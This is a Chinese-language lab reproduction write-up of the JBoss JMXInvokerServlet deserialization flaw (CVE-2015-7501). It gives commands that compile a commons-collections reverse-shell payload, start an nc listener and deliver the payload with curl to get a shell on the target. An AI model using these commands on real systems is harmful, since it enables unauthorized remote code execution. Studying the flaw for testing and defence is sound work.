(CVE-2015-7501)JBoss_JMXInvokerServlet_反序列化漏洞

# (CVE-2015-7501)JBoss JMXInvokerServlet 反序列化漏洞

=============

一、漏洞简介
————

由于JBoss中invoker/JMXInvokerServlet路径对外开放,JBoss的jmx组件支持Java反序列化

二、漏洞影响
————

Red Hat JBoss A-MQ 6.x版本;BPM Suite (BPMS) 6.x版本;BRMS
6.x版本和5.x版本;Data Grid (JDG) 6.x版本;Data Virtualization (JDV)
6.x版本和5.x版本;Enterprise Application Platform
6.x版本,5.x版本和4.3.x版本;Fuse 6.x版本;Fuse Service Works (FSW)
6.x版本;Operations Network (JBoss ON) 3.x版本;Portal 6.x版本;SOA
Platform (SOA-P) 5.x版本;Web Server (JWS) 3.x版本;Red Hat
OpenShift/xPAAS 3.x版本;Red Hat Subscription Asset Manager 1.3版本。

三、复现过程
————

win7一台,ip为172.26.1.151(靶机,安装了java环境)

kali一台,ip为192.168.1.192(攻击机)

输入
返回如图,说明接口开发,存在反序列化漏洞

![](/static/qingy/(CVE-2015-7501)JBoss_JMXInvokerServlet_反序列化漏洞/img/rId25.png)

进入kali攻击机,下载反序列化工具:

解压完,进入到这个工具目录 ,执行命令:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

继续执行命令:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.192:4444(IP是攻击机ip,4444是要监听的端口)

新界面开启nc准备接收反弹过来的shell。命令:nc -lvnp 4444

这个时候在这个目录下生成了一个ReverseShellCommonsCollectionsHashMap.ser文件,然后我们curl就能反弹shell了,执行命令:

curl http://172.26.1.151:8080/invoker/readonly –data-binary @ReverseShellCommonsCollectionsHashMap.ser 

![](/static/qingy/(CVE-2015-7501)JBoss_JMXInvokerServlet_反序列化漏洞/img/rId27.png)

打开nc界面,发现shell已经弹回来了

![](/static/qingy/(CVE-2015-7501)JBoss_JMXInvokerServlet_反序列化漏洞/img/rId28.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容